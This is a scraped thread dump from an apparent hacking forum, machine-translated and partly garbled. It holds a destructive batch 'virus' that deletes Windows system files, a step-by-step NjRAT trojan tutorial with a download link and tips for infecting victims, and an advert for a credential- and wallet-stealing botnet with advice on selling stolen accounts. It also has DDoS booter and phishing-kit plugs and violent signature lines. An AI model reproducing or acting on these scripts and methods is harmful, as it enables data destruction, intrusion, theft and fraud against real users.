[TUTO] Create your own virus <sep> TUTO even create your own virus that can destroy the PC so do not be sure to run it on your PC mdr.Example this code this code destroys your computer so do not run it the not really destroys it destroys the operating system: @echo offdel C: windowspchealthdel C: windowssystemdel C: windowssystem32
estoredel winlogon.exedel C: windowssystem32autoexec.ntBig if you do not understand too much del = delete all you want your virus to remove so you can destroy your PC which will be under PLS: @echo offdel The file or other path you want deleted and underneath you redo the same del del etc ... Good after you can not imagine what to do: go to: FileRegister under Mark the name of commet you want to call your file and add .batAll the filesRegisterYour virus is made you have more than send it.I am in no way responsible for your mistakes or others with this virus______________________________ An èz de groce mer show_eval15622NoteEvaluateLessMore;
[TUTO] Create your own virus <sep> AdvertisementRemove ads? Document.write <iframe scrolling = no src = / pub.php? F = 728x90oa = 1p = 728x90_lastmessci = 63aA = 1crtg_content = empty style = border: 0; width: 728px; height: 90px; frameborder = 0 allowTransparency = true> </ iframe>;
How Spoof an E-mail on Kali <sep> It seems to me that the ports smtp were the 25 the 587 or the 465 show_eval16354NoteEvaluateLessMore;
How Spoof an E-mail on Kali <sep> You are not wrong but it is the site itself that advises this port ______________________________ Happy horrible christmas38 ° 53 52 N 77 ° 02 12 Kill The Childrens ec4e07263910e1b2cf71cd6fe759a82d show_eval16357NoteEvaluateLessMore;
H3ll0 W0RlD =) <sep> Hello to allIs been for many years a hacking enthusiast and having done my job I stopped here and I found the forum nice. I am looking for someone working on cryptolocker if anyone knows this would be the top ______________________________ = SuperBenoit = show_eval16041NoteEvaluateLessMore;
H3ll0 W0RlD =) <sep> Hello yeah, I've got a big fuck on the section: d Ransomware Traja06 ______________________________ = SuperBenoit = show_eval16055NoteEvaluateLessMore;
Cheap PC to program code install software. <Sep> Hi everyone today I'm looking for advice because I tell a machete laptop pc to code programming watch videos and install software backtrack the cheapest possible I'm also looking for a no one who could answer any questions privately on BackTrack thanks forward ______________________________ Simple but very useful: p show_eval11598NoteEvaluateLessMore;
Darkcomet problem <sep> Hi I have darkcomet I have my ports open darkcomet well configure and everything. but when I create a RAT and I open it on my PC it does not work: show_eval13102NoteEvaluateLessMore;
[TUTO] Create your own virus <sep> It's technically a just virus that no one in the world will click on. That said you can create an .exe that opens a console that executes this code is always smoother. . .______________________________ Do not throw the arrow that will turn against you show_eval15633NoteEvaluateLessMore;
[TUTO] Create your own virus <sep> Dath wrote: It's technically a virus just nobody in the world will click on it. That said you can create an .exe that opens a console that executes this code is always smoother. . . Especially we can see the code by clicking Right Click> EditAfter yes the solution of .exe is always better than leaving it in .bat ______________________________ Happy horrible christmas38 ° 53 52 N 77 ° 02 12 O Kill The Childrens ec4e07263910e1b2cf71cd6fe759a82d show_eval15634NoteEvaluateLessMore;
RAT <sep> Hi all the world I have a lot of software for RAT like Beast and Nanocore but I can not manage the opening of the ports and juggle the IP so I need some clear tutorial with screens or that it makes me share on Skype ^^ MadzBlind skypeThanks ______________________________ BYE BYE show_eval13616NoteEvaluateLessMore;
Hello in this tutorial I will teach you how to create a NjRAT type RAT server NjRAT is in my opinion the most experienced trojan software being the most optimized for connection. In addition NjRAT is OpenSource so ... First of all install the software: http://www.mediafire.com/download/n7r4q63ltnj3lc4/njRATv0.7d.rarIf your antivirus reacts no worries just uninstall it All Trojan software make react lantivirus 1 Following this to protect your IP appointments on the site http://www.noip.com/ create an account and install the software. The creation of the account is MANDATORY2 Once your account created you should arrive on a page like this: SpoilerIf this is not the case make it happen to get here.Click on Add a Host then give the Hostname that you wish thereafter remove ddns. net and replace it by noip.orgTherefore do not touch anything and just click on Add Host 3 Once this step is done connect to the DUC software previously downloaded Noip all the LEDs will normally be Red Or will have a cross There you just press Edit Host and select the host you have just created Following this all the lights will be green.4 It will eventually open your ports Port 5553 is extremely important whether this port is open and not another for that I refer you to very good tutorials available in bulk on Youtube. 5 Good all the preparations are finished now open NjRATOn time done a page will open asking the port you want to use mark 5553 and click on Start 6 Then click on Builder a small page will open.In Host Put the NOIP host that you had create all the time Be careful to make no mistakes in writing the password in Victim Name Put what you want but be careful not to put space in the name it could make bugger the software. Personally I tend to leave the default name. Then do not touch anything and click on Build You will find if everything went well your server on your desktop that you can rename.7 The moment of GLORY send the software to your enemies You will have them disable their antivirus and their computers you will belong. You will be able to Turn on your cam to watch his screen and move his mouse or even use the Keylogger already installed You can also chat with your victim by taking the nickname that you do not want very discreet I grant you Tip: Do not forget to re open DUC a every time you turn on your pc so there is no problem. A good technique to take someone RAT propose to the person to make a TeamViewer all amicably enjoy to upload the software yourself on the pc of the victim and lennencher even the victim following this can not do much. you are never a victim of a RAT NjRAT or not To disable it simply go to your task manager and disable the task related to the server.Tutoriel completed. ______________________________ Do not throw the arrow that will turn against you show_eval11378NoteEvaluateLessMore;
My Biggest Tuto: D <sep> Yho Hackers Tell Me Bands of People Would you like to have a tutorial on: How to Install Kali Net Hunter on your Android Device? No I'm not talking about Nexus OnePlus One If yes Vote to show me your support and your envy Because it will be a big tutorial as much in size as in personal importance I am hot motivated ^^. So more and tell me what you want in MP or Comments Description Yho In this Spoiler I will explain what is possible to do with KLNet. A Linux PC Handheld: So no it's not a joke With KLNet you really have a kali on your phone / tablet because you have a SSH VNC that is directly connected to a Kali Emulation If that's not a good reason Useful Applications: You have indeed a good amount of applications and features delivered with KLNet: Quote: Csploit / AndroidVNC / BlueNMEA / DriveDroid Keyboard Hackers / NetHunter / RF RouterKeygen Analyzer / Shodan / Terminal Emulator USB Keyboard App Details: Csploit: This is a very cool Android MITM applications AndroidVNC: As the name lets indicate It is the VNC Viewer for Android BlueNMEA: What I understood is a GPS application. Sorry I'm never served DriveDroid: This is an application of Booting dOS. In short it is like a bootable key but with several OS. || Tackle: http://www.phonandroid.com/forum/booterdesdistroslinuxviaandroidt5058 Hackers Keyboard: This is an android keyboard in the appearance of a computer keyboard. Nethunter: This is the heart of KLNet It has a lot of features: USB Rubby Ducky / MITM / Payload Generator / Launch Services and many more RF Analyzer: As its name suggests. It is used to scan the radio frequencies. But you need the necessary equipment RouterKeygen: This is a good WiFI cracking application Very can WiFi are vulnerable but works Super good Shodan: This is a small jewelry This is a website specialized in finding connected objects for later control Terminal Emulator : Good as its name indicates. It is a Linux Terminal Emulator. and this is where Kali Linux will be usable. Because it's too much Class: Well we will not hide it is too Badass Here I hope you have convinced Ask me all your questions I read them and answer Ps: / Your device must be rootable / root for this Tuto otherwise it will be impossible to realize this tutorial / ______________________________ Happy horrible christmas38 ° 53 52 N 77 ° 02 12 O Kill The Childrens ec4e07263910e1b2cf71cd6fe759a82d Last edited by Traja06 on Sun 30 Apr 20:03 2017; edited 2 times in total show_eval15099NoteEvaluateLessMore;
how to hack a count youtube <sep> Yes but it seems to me that gmail blocks accounts to several attempts passwords failed with a chance of luck the bruteforce will access his account before the account hangs show_eval14037NoteEvaluateLessMore;
[TUTO] The text that makes the iPhone crash (iOS 8). <Sep> The text that crashes the iPhone: This is a malicious trick that a user of the Reddit community site has discovered. The following character string sent by a third party via SMS is capable of running an iPhone only on iOS 8 or preventing the Messages application from working properly. This crash occurs as soon as this message is displayed on the screen. It is nevertheless very difficult to reproduce because it is composed of complex characters. In fact this string of special characters saturates the memory of the phone that fails to interpret the message. Power h. How to restore the situation in case "attack": If you ever receive the message several solutions are available to you so that your iPhone returns to normal operation. If you have a MacBook you can answer this text with iMessage on OSX. Answering by Siri also helps to restore the situation. If the person sends you another message the situation will also return to normal. To protect yourself from the bug and unwanted restart of your iPhone you can also disable notifications from iMessage. Now, wait for an Apple patch to no longer fear the arrival of the cursed SMS on his iPhone.Good day show_eval11104NoteEvaluateLessMore;
BotNet <sep> HelloI present to your attention the longawaited botnet URIUniversal Remote InstallerThis is primarily a Trojan A program with a .exe extension that gives you access to your PC.This is not RMS There is no need to know anything about it, but there is no need for it.We pass to the functional1 Auto Backup2 Hiding from these task managers: Standard ProcessHacker ProcessMonitor PcHunter.3 Send files to a specific computer and run this file4 Send files to all the bots that are online and start this file5 Obtaining information about the bot video card version. Net framework number of cores8 Obtain network information about the bot ip country_country9 Statistics bots online and graphical display Top 3 leading countries10 Bypassing Proactive Defense11 Getting a screenshot of the bot screen12 Updating the bot file to a newer one13 Run remotely on a victim computer C commands VBscripts PowerShellcommands BATfiles14 Stealing Logins and Passwords from 8 browsers STILLER15 Stealing Cookies files from 8 browsers16 Stealing Bitcoinfiles from Bitcoin Litecoin wallet.dat17 Performing WinAPI functions on a bot18 not19 a Silient app true20 VM Detect21 Stealing files from the desktop22 Replacing of BTC / XMR / ETH / ZEC / LTC purses26 Saving the settings for wallets and iplogger27 Fake error when starting build28 Substitution of QIWI purseHow to monetize this: Theft of accounts nd their subsequent resales or you can check it yourself I think a lot of things to do in the past. I'm sorry, I have 200 botsthis is 200 logs and at least 200 akI download the stealerI receive 200 akand spam or sell these akia week later I am a new girlfriend and stealer teki Aki VK only with changed password it is possible to milk more than the same victim until it blows down the Windows because the backdoor itself is bespalevnyOr can I write a chela that he was ordered and you are a super hackerhe changes the password and you are stealing again and you write with meRunning the minerals even if you do not have a FUD miner you can just manually disable the victims AntiVirus and start your minerSale of installations here is the By assigning a number of infected PCs you can sell the installs. Both selectively by country and MICSIf the loadable FUD file is 9094 and it will be shown that these competitors will be able to compete with each other. several times by the same flow of traffic.All of you know that there are such sellers. I myself do not welcome this goal that is you can for 5 times with 1000 bots and this is 5 80 or how much they are costingReviews of YouTube and the rest of the service on the rollup yes you can stupidly add the prog ReklamGenerator which in public register your links and run on the victims PC. and if she also has an amigo it will be worthwhile to make a difference RMS RMS and then sell them or you can create a RMS to run it on the victims RMSnick ready and you can sell for 20 rubles again you can in a couple of handsBy the way you can and vice versa to take care of your body restealing logs selling installs wrapping service starting RMS and later selling you to a couple of hands 100500 options for implementation PCFree Stalk CleaningAnd a bunch of other functionsSupport from me is eternalPrice 150Contact: Telegram @ Graf1313Vladimir show_eval16365NoteEvaluateLessMore;
Someone will have a crack of ars encrypt? <Sep> ok ______________________________ We are Anonymous. We are Legion. We do not forgive. We do not forget. Please note that what is secure at 99 is not secureLife is a hackPrice show_eval12025NoteEvaluateLessMore;
Presentation of my site DDOS <sep> I present to you my booter it sappel BootYourEnemy If you want to go see http://bootyourenemy.esy.es/ My source is Horizon the prices are really low it has 40Gbps For which will buy thanks to you helped you develop A developer that will make us a site to us A domain name a more powerful API <3 lt; 3 show_eval12607NoteEvaluateLessMore;
Who will have a hack facebook <sep> Hi everyone i would like to know if someone has a hack facebook thanks david show_eval1275NoteEvaluateLessMore;
[SOLVED] Phishing problem <sep> Hello / Good eveningI wanted to ask you to maidez found a site that allows to create fake mail to pass for google or whatever else because I galere / / ______________________________ Newly Forum: OLast edited by SayniHack on Wed 5 Jul 15:51 2017; edited 1 time in total show_eval15677NoteEvaluateLessMore;
[SOLVED] Phishing Problem <sep> Gifthttp: //zshadow.co show_eval15721NoteEvaluateLessMore;
Hack Youtube <sep> 2 Solutions: PishingStealerOu Google Hacker ______________________________ MisterMattt77 CSGO Player and virus fan.Booter used: http://StresserIP.esy.es/ show_eval1677NoteEvaluateLessMore;
Location: :: 1: Hi all I have set up a sks key server in order to centralize key management for hackbbs. I will write three howto in the week to explain how pgp works. How to create your keys how to use the keys and how to use a sks server send search on the server etc etc ... So to all those using PGP the server sks is a: hkp: //pgp.hackbbs.org and is I'm at home. in a basic way to add your keys to the server: Code: gpg sendkeys keyserver hkp: //pgp.hackbbs.org <ID> to search for a key: Code: gpg searchkeys keyserver hkp: //subkeys.pgp.net < reason> Likewise the keys present in the section will be set to DEPRACATED not no longer valid but simply to incite to use the sks key server which presents more than the classic lotto exchange solution by forum. Inform @ tely Manu404
Hello I propose you my first tools coded to my beginnings in Perl ^^. This is Scanport a port scanner of the most basic but nonetheless fast. Voila all is said ^^ the code has not been changed since and has a lot of level ugliness code is why I ask not to tell me uses the ARGV or other I started and I do not Voluntarily modified However other remarks can be useful I am waiting for them. Code: / usr / local / bin / perl use strict; use warnings; use Tk; my fen; fen = MainWindow> new; fen> minsize29585; fen> titleScanport V1 / By kmkZ; my text = fen> Label text => Scanport V1 / By kmkZ> pack; use Net :: Ping; use IO :: Socket :: INET; |; no print timer enter a target IP ..:
; my base = <stdin>; my p = Net :: Ping> new icmp 5; delay on ping: 5 seconds my host = base; first we try the ping if p> pinghost {print
host: Active
; } My @ ports = 212223257980107110138139143194220222143315213306522252235900666766978080; if it works we try a connection on each desired ports we can add of course; for my port @ports {my s = IO :: Socket :: INET> new PeerAddr => host PeerPort => port Timeout => 2 in seconds possibility of changing the time; next if s s> connected; print i »open port: port
; close s; } print
; print @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
; print @ BYÂ¤ KMKZ Â¤ @
; print @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
; my button = fen> Button text => Click here to Close command => sub {exit}> pack; MainLoop;
I know this topic dates a little but by the way: If you want to look for flaws or exploit go to specialized sites like securityfocus or packetstormsecurity .... For exploits I prefer milworm but after It's a question of taste. Hoping to have helped ...
Quote: I wish it was over by the end of December. The principle is to mount a vpn between several vm and inside this wlan everything will be allowed. This will give us more freedom to experiment with different types of attacks / espionage / ctf / etc ... In short, a case in progress and I hate that it will happen. This could be very interesting. More information will be given. when the architecture will be in place for the moment it is still a prototype under construction. thanks Korigan that's going to be awesome
